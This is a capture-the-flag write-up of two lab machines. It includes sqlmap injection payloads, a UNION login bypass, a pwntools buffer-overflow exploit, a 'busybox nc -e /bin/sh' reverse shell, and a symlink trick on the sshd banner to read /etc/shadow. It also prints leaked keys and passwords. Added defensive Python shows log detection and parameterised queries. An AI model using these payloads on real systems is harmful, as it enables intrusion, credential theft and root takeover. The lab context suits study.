[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:25:22 /2025-03-31/
[15:25:22] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.50.58:80/littlesecrets/login.php
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[15:25:22] [INFO] testing URL 'http://192.168.50.58:80/littlesecrets/login.php'
[15:25:22] [INFO] using '/root/.local/share/sqlmap/output/results-03312025_0325pm.csv' as the CSV results file in multiple targets mode
[15:25:22] [INFO] testing connection to the target URL
[15:25:22] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:25:22] [INFO] testing if the target URL content is stable
[15:25:23] [INFO] target URL content is stable
[15:25:23] [INFO] testing if POST parameter 'username' is dynamic
[15:25:23] [WARNING] POST parameter 'username' does not appear to be dynamic
[15:25:23] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[15:25:23] [INFO] testing for SQL injection on POST parameter 'username'
[15:25:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:23] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:25:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:25:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:25:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:25:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:25:23] [INFO] testing 'Generic inline queries'
[15:25:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:25:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:25:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:25:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:25:33] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:25:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:25:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:25:33] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 7217 FROM (SELECT(SLEEP(5)))jvCv) AND 'hZWY'='hZWY&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[15:25:48] [INFO] the back-end DBMS is MySQL
[15:25:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.59
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:25:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-03312025_0325pm.csv'
[*] ending @ 15:25:53 /2025-03-31/
If the output is hard to read, hand it to an AI: it says sqlmap found a SQL injection, a time-based blind one. Continue with sqlmap:
sqlmap -l sing.txt --batch
sqlmap -l sing.txt --batch --dbs
sqlmap -l sing.txt --batch -D news_db --tables
sqlmap -l sing.txt --batch -D news_db -T users --columns
sqlmap -l sing.txt --batch -D news_db -T users -C user1 --dump
┌──(root㉿kali-plus)-[~]
└─# sqlmap -l sing.txt --batch -D news_db -T users -C user1 --dump
sqlmap {1.9#stable} https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:52:17 /2025-03-31/
[15:52:17] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.50.58:80/littlesecrets/login.php
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[15:52:18] [INFO] testing URL 'http://192.168.50.58:80/littlesecrets/login.php'
[15:52:18] [INFO] resuming back-end DBMS 'mysql'
[15:52:18] [INFO] using '/root/.local/share/sqlmap/output/results-03312025_0352pm.csv' as the CSV results file in multiple targets mode
[15:52:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 7217 FROM (SELECT(SLEEP(5)))jvCv) AND 'hZWY'='hZWY&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[15:52:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.59
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:52:18] [INFO] fetching entries of column(s) 'user1' for table 'users' in database 'news_db'
[15:52:18] [INFO] fetching number of column(s) 'user1' entries for table 'users' in database 'news_db'
[15:52:18] [INFO] resumed: 2
[15:52:18] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[15:52:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:52:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:52:18] [INFO] retrieved:
Database: news_db
Table: users
[2 entries]
+---------+
| user1 |
+---------+
| <blank> |
| <blank> |
+---------+
[15:52:18] [INFO] table 'news_db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.50.58/dump/news_db/users.csv'
[15:52:18] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-03312025_0352pm.csv'
[*] ending @ 15:52:18 /2025-03-31/
But we cannot log in directly; the page shows: Access Denied. You do not have permission to access this page.
user flag
This path goes nowhere, so switch to news.php and try a UNION injection.
sqlmap identified the following injection point(s) with a total of 66 HTTP(s) requests:
---
Parameter: title (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: title=sing' AND 2782=2782 AND 'arlV'='arlV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=sing' AND (SELECT 4507 FROM (SELECT(SLEEP(5)))xeKo) AND 'odSe'='odSe
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: title=sing' UNION ALL SELECT NULL,NULL,CONCAT(0x7171627a71,0x53567261624e586a5862514b4966727167526d524b6b67426c4c766e587051785449495576575146,0x717a787671)-- -
---
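The following added Python example (not from the write-up) serves both the Newbee file-read probes earlier (the hack= traversal and the php:// wrapper) and the sqlmap injection summary just shown: it parses Apache combined-format access-log lines, URL-decodes the query string and flags the probe patterns, so a defender can see these requests in the web server's own logs. The log lines, client IPs and timestamps are constructed; the payloads are URL-encoded forms of the ones reported above.

```python
"""Added example: flag the web probes seen in this write-up (directory traversal,
php:// wrappers, SLEEP delays, boolean tautologies, UNION SELECT) in Apache logs."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines. Lines 2-3 mirror the Newbee file read,
# lines 4-6 the title= payloads sqlmap reported for SingDanceRap.
SAMPLE_LOG = """\
192.168.1.50 - - [29/Mar/2025:00:30:11 +0800] "GET /index.php HTTP/1.1" 200 18852 "-" "Mozilla/5.0"
192.168.1.50 - - [29/Mar/2025:00:31:02 +0800] "GET /?hack=../../../../../../etc/passwd HTTP/1.1" 200 18863 "-" "Wfuzz/3.1.0"
192.168.1.50 - - [29/Mar/2025:00:33:45 +0800] "GET /?hack=php://filter/convert.base64-encode/resource=secret.php HTTP/1.1" 200 22410 "-" "Mozilla/5.0"
192.168.50.85 - - [31/Mar/2025:15:25:30 +0800] "GET /news.php?title=sing%27%20AND%202782%3D2782%20AND%20%27arlV%27%3D%27arlV HTTP/1.1" 200 1301 "-" "sqlmap/1.9#stable"
192.168.50.85 - - [31/Mar/2025:15:25:41 +0800] "GET /news.php?title=sing%27%20AND%20%28SELECT%204507%20FROM%20%28SELECT%28SLEEP%285%29%29%29xeKo%29%20AND%20%27odSe%27%3D%27odSe HTTP/1.1" 200 1301 "-" "sqlmap/1.9#stable"
192.168.50.85 - - [31/Mar/2025:15:25:52 +0800] "GET /news.php?title=sing%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7171627a71%2C0x53%2C0x717a787671%29--%20- HTTP/1.1" 200 1450 "-" "sqlmap/1.9#stable"
192.168.50.85 - - [31/Mar/2025:15:26:10 +0800] "GET /news.php?title=dance HTTP/1.1" 200 1297 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is named after the technique from the write-up whose probe it matches.
# Rules run on the URL-decoded, whitespace-collapsed query string, so %27/%20
# encoding or padded spaces do not hide a payload.
RULES = [
    ("directory traversal", re.compile(r"\.\./")),
    ("php wrapper", re.compile(r"\bphp://", re.I)),
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    # AND 2782=2782 / AND 'arlV'='arlV : same token on both sides of '='
    ("boolean-based blind", re.compile(r"\band\s+'?(\w+)'?\s*=\s*'?\1\b", re.I)),
    ("union query", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]


def classify(query: str) -> List[str]:
    """Return the names of every rule that fires on a decoded query string."""
    return [name for name, rx in RULES if rx.search(query)]


def parse_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line into a record; None if it does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = " ".join(unquote_plus(parts.query).split())
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "query": query,
        "status": int(m.group("status")),
        "techniques": classify(query),
    }


def scan_log(text: str) -> List[Dict]:
    """Return the records of every request that matched at least one rule."""
    return [rec for rec in map(parse_line, text.splitlines())
            if rec and rec["techniques"]]
```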
Use the command sqlmap -u "http://192.168.50.58/news.php?title=sing" --file-read=/etc/passwd to read files:
┌──(root㉿kali-plus)-[~]
└─# cat /root/.local/share/sqlmap/output/192.168.50.58/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_rpc:x:106:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin
tftp:x:108:112:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
mysql:x:110:115:MySQL Server,,,:/nonexistent:/bin/false
he110wor1d:x:1001:1001::/home/he110wor1d:/bin/bash
Next, try reading other files as well, such as configuration files. Since the middleware is Apache, try reading the Apache configuration:
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/he110wor1d/>
Options -Indexes
AllowOverride None
Require all granted
</Directory>
<VirtualHost *:80>
DocumentRoot /var/www/he110wor1d
<Directory /var/www/he110wor1d>
Options -Indexes
AllowOverride None
Require all granted
</Directory>
<FilesMatch \.php$>
SetHandler application/x-httpd-php
</FilesMatch>
ErrorLog ${APACHE_LOG_DIR}/xxx_error.log
CustomLog ${APACHE_LOG_DIR}/xxx_access.log combined
</VirtualHost>
This shows the site's source lives under /var/www/he110wor1d, so we can go on to read the contents of manager.php:
┌──(root㉿kali-plus)-[~]
└─# cat /root/.local/share/sqlmap/output/192.168.50.58/files/_var_www_he110wor1d_littlesecrets_manager.php
<?php
session_start();
if (!isset($_SESSION['username'])) {
header("Location: login.php");
exit();
}
if ($_SESSION['username'] !== 'he110wor1d_admin') {
die("Access Denied. You do not have permission to access this page.");
}
$command_output = '';
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['command'])) {
$command = $_POST['command'];
$command_output = shell_exec($command);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Manager Panel</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.manager-container {
background-color: #fff;
padding: 20px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
width: 600px;
text-align: center;
}
.manager-container h2 {
margin-bottom: 20px;
color: #333;
}
.manager-container input[type="text"] {
width: 100%;
padding: 10px;
margin-bottom: 15px;
border: 1px solid #ccc;
border-radius: 5px;
font-size: 16px;
}
.manager-container input[type="submit"] {
width: 100%;
padding: 10px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
}
.manager-container input[type="submit"]:hover {
background-color: #0056b3;
}
.manager-container .output {
background-color: #f9f9f9;
padding: 10px;
border: 1px solid #ccc;
border-radius: 5px;
margin-top: 20px;
text-align: left;
font-family: monospace;
white-space: pre-wrap;
word-wrap: break-word;
}
</style>
</head>
<body>
<div class="manager-container">
<h2>Manager Panel</h2>
<form action="manager.php" method="POST">
<input type="text" name="command" placeholder="Enter command" required>
<input type="submit" value="Execute">
</form>
<?php if (!empty($command_output)): ?>
<div class="output">
<h3>Command Output:</h3>
<pre><?php echo htmlspecialchars($command_output); ?></pre>
</div>
<?php endif; ?>
</div>
</body>
</html>
So there is command execution, but it requires the session username to be he110wor1d_admin; the command is then POSTed in the command parameter. That did not work, so read the source of login.php next:
┌──(root㉿kali-plus)-[~]
└─# cat /root/.local/share/sqlmap/output/192.168.50.58/files/_var_www_he110wor1d_littlesecrets_login.php
<?php
// Database connection
$servername = "localhost";
$username = "root";
$password = "i_love_sing_dance_rap";
$dbname = "news_db";
$conn = new mysqli($servername, $username, $password, $dbname);
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$login_error = "";
if ($_SERVER["REQUEST_METHOD"] == "POST") {
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "SELECT id, username, password FROM users where username='$username'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
if ($password === $row['password']) {
session_start();
$_SESSION['user_id'] = $row['id'];
$_SESSION['username'] = $row['username'];
header("Location: manager.php");
exit();
} else {
$login_error = "Invalid username or password.";
}
} else {
$login_error = "Invalid username or password.";
}
}
$conn->close();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.login-container {
background-color: #fff;
padding: 20px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
width: 300px;
text-align: center;
}
.login-container h2 {
margin-bottom: 20px;
color: #333;
}
.login-container input[type="text"],
.login-container input[type="password"] {
width: 100%;
padding: 10px;
margin-bottom: 15px;
border: 1px solid #ccc;
border-radius: 5px;
font-size: 16px;
}
.login-container input[type="submit"] {
width: 100%;
padding: 10px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
}
.login-container input[type="submit"]:hover {
background-color: #0056b3;
}
.login-container .error {
color: #ff0000;
margin-bottom: 15px;
}
</style>
</head>
<body>
<div class="login-container">
<h2>Login</h2>
<?php if (!empty($login_error)): ?>
<div class="error"><?php echo $login_error; ?></div>
<?php endif; ?>
<form action="login.php" method="POST">
<input type="text" name="username" placeholder="Username" required>
<input type="password" name="password" placeholder="Password" required>
<input type="submit" value="Login">
</form>
</div>
</body>
</html>
From the line $sql = "SELECT id, username, password FROM users where username='$username'"; we can tell the query is closed with single quotes, so a payload can be constructed:
' union select 1,'he110wor1d_admin','pass
pass
That way the SQL statement becomes $sql = "SELECT id, username, password FROM users where username='' union select 1,'he110wor1d_admin','pass'"; Once inside there is an input box that executes commands, which can be used to obtain a reverse shell. After getting the shell, switch to the he110wor1d user; the password is i_love_sing_dance_rap:
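The whole login bypass rests on the string-built query in login.php: the attacker-supplied username becomes part of the SQL text, so a UNION can return a row that was never in the table, and the later `$password === $row['password']` check then compares against a value the attacker chose. As an added example that is not part of the original write-up, the Python below reproduces the two lookups against an in-memory SQLite table (constructed data; the seeded password is not the box's) with the exact payload used above: `lookup_vulnerable` concatenates the way login.php does, `lookup_safe` binds the value as a parameter. Function names are assumptions.

```python
import sqlite3

# Constructed table: one real account; the password is not the box's.
SEED_USERS = [(1, "he110wor1d_admin", "correct horse battery staple")]

# The exact payload used against login.php above.
PAYLOAD = "' union select 1,'he110wor1d_admin','pass"


def make_db():
    """In-memory stand-in for news_db.users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Mirrors login.php: the username is spliced into the SQL text, so the
    quote in the payload closes the literal and the UNION adds a row."""
    sql = f"SELECT id, username, password FROM users WHERE username='{username}'"
    return conn.execute(sql).fetchone()


def lookup_safe(conn, username):
    """Same query with a bound parameter: the input is only ever a value, so
    the quotes and the UNION are looked up literally and match nothing."""
    sql = "SELECT id, username, password FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchone()


def login(lookup, conn, username, password):
    """login.php's check: fetch the row by username, compare the submitted
    password with whatever the row holds, and return the logged-in name."""
    row = lookup(conn, username)
    if row is None or password != row[2]:
        return None
    return row[1]


def demo():
    """Run the three cases that matter: payload against both lookups, and
    the real credentials against the safe one."""
    conn = make_db()
    return {
        "vulnerable_with_payload": login(lookup_vulnerable, conn, PAYLOAD, "pass"),
        "safe_with_payload": login(lookup_safe, conn, PAYLOAD, "pass"),
        "safe_real_credentials": login(lookup_safe, conn, "he110wor1d_admin",
                                       "correct horse battery staple"),
    }


if __name__ == "__main__":
    for case, who in demo().items():
        print(f"{case}: {who!r}")
```

In PHP the equivalent fix is a mysqli prepared statement (`$conn->prepare(...)` with `bind_param`). Hashing stored passwords with password_hash/password_verify is also needed, but on its own it would not have stopped this login, because the forged row supplies both the username and the value the password is compared against; the parameterised query is what removes the forgery.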
www-data@singdancerap:/home$ su he110wor1d
su he110wor1d
Password: i_love_sing_dance_rap
he110wor1d@singdancerap:/home$ id
id
uid=1001(he110wor1d) gid=1001(he110wor1d) groups=1001(he110wor1d)
he110wor1d@singdancerap:~$ ls
ls
thekey2root user.txt
he110wor1d@singdancerap:~$ cat user.txt
cat user.txt
#SQL injection can not only retrieve data but also forge it.
User flag:107883ee-f5e4-11ef-8542-005056207011
Privilege escalation - root flag
In the home directory there is a thekey2root directory containing a thekey2root file. cat could not display it; judging by the content it is a binary, so pull it down and take a look:
int __cdecl main(int argc, const char **argv, const char **envp)
{
system("echo 'input something:'");
input(&argc);
system("echo 'thanks for your input'");
return 0;
}
int input()
{
char v1[24]; // [esp+Ch] [ebp-1Ch] BYREF
return __isoc99_scanf("%s", v1);
}
int sing_dance_rap()
{
setuid(0);
setgid(0);
return system("echo 'Hey,bro! What are you looking for?'");
}
I found hyh's write-up and used his script:
from pwn import *
# Set the context and the program path
context(arch='i386', os='linux')
elf = ELF('./thekey2root') # replace with your program name
# Get the function addresses
sing_dance_rap_addr = elf.symbols['sing_dance_rap']
system_addr = elf.plt['system']
# Obtain the address of v1 by debugging (for example 0xffffd0ac)
v1_addr = 0xffe8378c # replace with the actual address
# Build the payload
payload = b'/bin/sh\x00' # write /bin/sh into the buffer
payload += b'A' * (32 - len(payload)) # pad to 32 bytes
payload += p32(sing_dance_rap_addr) # overwrite the return address with sing_dance_rap
payload += p32(system_addr) # after sing_dance_rap returns, execute system
payload += p32(0xdeadbeef) # return address for system (placeholder)
payload += p32(v1_addr) # argument for system, pointing at /bin/sh
# Start the process and send the payload
p = process('./thekey2root')
p.send(payload) # use send rather than sendline to avoid appending a newline
p.interactive() # enter interactive mode
┌──(root㉿kali-plus)-[~/singdancerap]
└─# chmod +x thekey2root
┌──(root㉿kali-plus)-[~/singdancerap]
└─# python3 exp.py
[*] '/root/singdancerap/thekey2root'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
[+] Starting local process './thekey2root': pid 1360217
[*] Switching to interactive mode
input something:
$ ls
Hey,bro! What are you looking for?
[*] Got EOF while reading in interactive
$ ls
[*] Process './thekey2root' stopped with exit code -11 (SIGSEGV) (pid 1360217)
[*] Got EOF while sending in interactive
We can see it successfully entered the sing_dance_rap function; now we need a way to control the argument passed to system. Because the array in the input function is declared inside the function, i.e. it is a local variable that cannot be reached from outside, we have to look for a string we can write to or otherwise use. Unfortunately there is none, so the only option is to search the existing strings. In C, when a function receives a string address as its argument, it reads byte by byte until it hits \0. Above we can see that at 0x804a03e, the address of s, there happens to be a \x00 immediately after it, so this is a valid string. What remains is to use that on the Linux side: what the function actually executes is system("s"), so if a binary named s exists and contains the privilege escalation code, commands get executed. I debugged this locally, again following hyh's write-up and reproducing it step by step:
┌──(root㉿kali-plus)-[~/singdancerap]
└─# python3 exp1.py
[*] '/root/singdancerap/thekey2root'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
[+] Opening connection to 192.168.50.58 on port 12345: Done
[*] Switching to interactive mode
input something:
$ ls
Hey,bro! What are you looking for?
$ ls
s
thekey2root
tmp
tmp1
tmp.py
$ ls
s
thekey2root
tmp
tmp1
tmp.py
$ id
uid=0(root) gid=0(root) groups=0(root),1001(he110wor1d)
$ pwd
/home/he110wor1d/thekey2root
$ cd ..
$ cd.
$
$ cd ..
$ cd ..
$ ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cd root
$ ls
root.txt
$ cat root.txt
#During the process of PWN, the execution of the system function does not necessarily have to be bash.
root flag:943ac8c9-f696-11ef-8bd4-005056207011
A lot of this involved binary exploitation, so binary-related knowledge is something I need to study more.
Hero
The IP address is 192.168.56.102.
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.102 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 19:51 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
5678/tcp open rrac
MAC Address: 08:00:27:2A:F6:67 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.102:80
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
We get a private key but do not know the username; check it with ssh-keygen:
┌──(root㉿kali-plus)-[~]
└─# chmod 600 hero
┌──(root㉿kali-plus)-[~]
└─# ssh-keygen -y -f hero
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiYY31x+ZMvvHfmGWC7ZE75BbdbAKYEtIX75k6CL27C shawa@hero
user flag
The username is shawa. Port 5678 runs n8n; I gave the GitHub page to Kimi and had it summarise it for me:
n8n is a workflow automation platform that combines the flexibility of code with the speed of no-code. It has over 400 integrations, native AI capabilities and a fair-code licence, letting users build powerful automation workflows while keeping full control over data and deployment.
Main features and purposes:
Code flexibility: users can write JavaScript/Python when needed, add npm packages, or work in the visual interface.
AI-native platform: users can build AI agent workflows on LangChain with their own data and models.
Full control: users can self-host under the fair-code licence or use n8n's cloud service.
Enterprise features: advanced permission management, single sign-on (SSO) and air-gapped deployment.
Active community: over 400 integrations and over 900 ready-made templates.
Quick start: n8n can be launched quickly via npx (requires Node.js) or Docker.
Rich resources: documentation, 400+ integrations, example workflows, AI and LangChain guides, a community forum and community tutorials.
Support: users can get support in the community forum and exchange with other users.
Licensing: n8n uses a fair-code licence, comprising the Sustainable Use License and an Enterprise License, which always lets users view the source, deploy anywhere, and add their own nodes and features.
Contributing and team: users can report bugs or propose features and consult the contribution guide to start contributing; they can also look at job openings to join the n8n team.
The name n8n comes from "nodemation", meaning "node automation", combining Node.js and automation.
Set that aside for now. Register an account and look at the available features. Once inside, go to Overview -> Credentials -> type ssh and it finds the matching credential type -> enter the username and private key obtained earlier. The IP here cannot be localhost or 127.0.0.1; it should be 172.17.0.1, because n8n is running inside Docker. -> Create a workflow with Trigger manually as the first node and SSH (Execute Command) as the second, then put the reverse shell command busybox nc 192.168.56.102 1234 -e /bin/sh in the command field. That yields a shell as the shawa user, and with it the user flag:
cd home
ls
shawa
cd shawa
ls
user.txt
cat user.txt
HMVOHIMNOTREAL
Privilege escalation - root flag
I wanted to escalate but there is no sudo. While reading sshd_config I noticed it specifies the banner file location, /opt/banner.txt:
# no default banner path
Banner /opt/banner.txt
Next, the command ln -s /etc/shadow banner.txt can be used to create a symlink for reading the username and password information; /root/root.txt can be read the same way.
First use socat to forward the port out so that we can get an interactive shell:
./socat TCP-LISTEN:2222,fork TCP4:172.17.0.1:22 &
Then ssh in:
ssh shawa@192.168.0.205 -i key -p 2222
hero:~$ id
uid=1000(shawa) gid=1000(shawa) groups=1000(shawa)
cd /opt
rm banner.txt
ln -s /root/root.txt /opt/banner.txt
ssh shawa@192.168.0.205 -i key -p 2222
HMVNOTINPRODLOL
Welcome to Alpine!
The root password can also be obtained, using the command ln -s /etc/shadow banner.txt. ssh may need -o StrictHostKeyChecking=no when logging in; on login it then displays the root user's password:
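The root of this escalation is that sshd opens the Banner file with root privileges and prints it to clients before authentication, and it follows symlinks, so a banner living in a directory a low-privileged user can write to becomes an arbitrary-file read. As an added example that is not part of the original write-up, the Python below is the check a hardening script would run: it pulls the Banner directive out of sshd_config and reports when the file is a symlink, sits in a world-writable directory, or is writable or not root-owned. The fixture it builds in a temporary directory reproduces the misconfiguration from the box (constructed; nothing here is the box's real path), and the function names are assumptions.

```python
import os
import stat
import tempfile


def banner_path(sshd_config_text):
    """Return the Banner file named in sshd_config, or None if unset/"none".
    Like sshd, the first occurrence of a keyword wins."""
    for raw in sshd_config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments, as in the file above
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "banner":
            return None if value.lower() == "none" else value
    return None


def audit_banner_file(path):
    """Return finding codes for a banner file that sshd opens with root
    privileges and prints to unauthenticated clients."""
    findings = []
    if stat.S_ISLNK(os.lstat(path).st_mode):
        findings.append("symlink")  # what gets printed is whatever the link points at
    st = os.stat(path)  # the file sshd actually reads (link target if any)
    parent = os.path.dirname(path) or "/"
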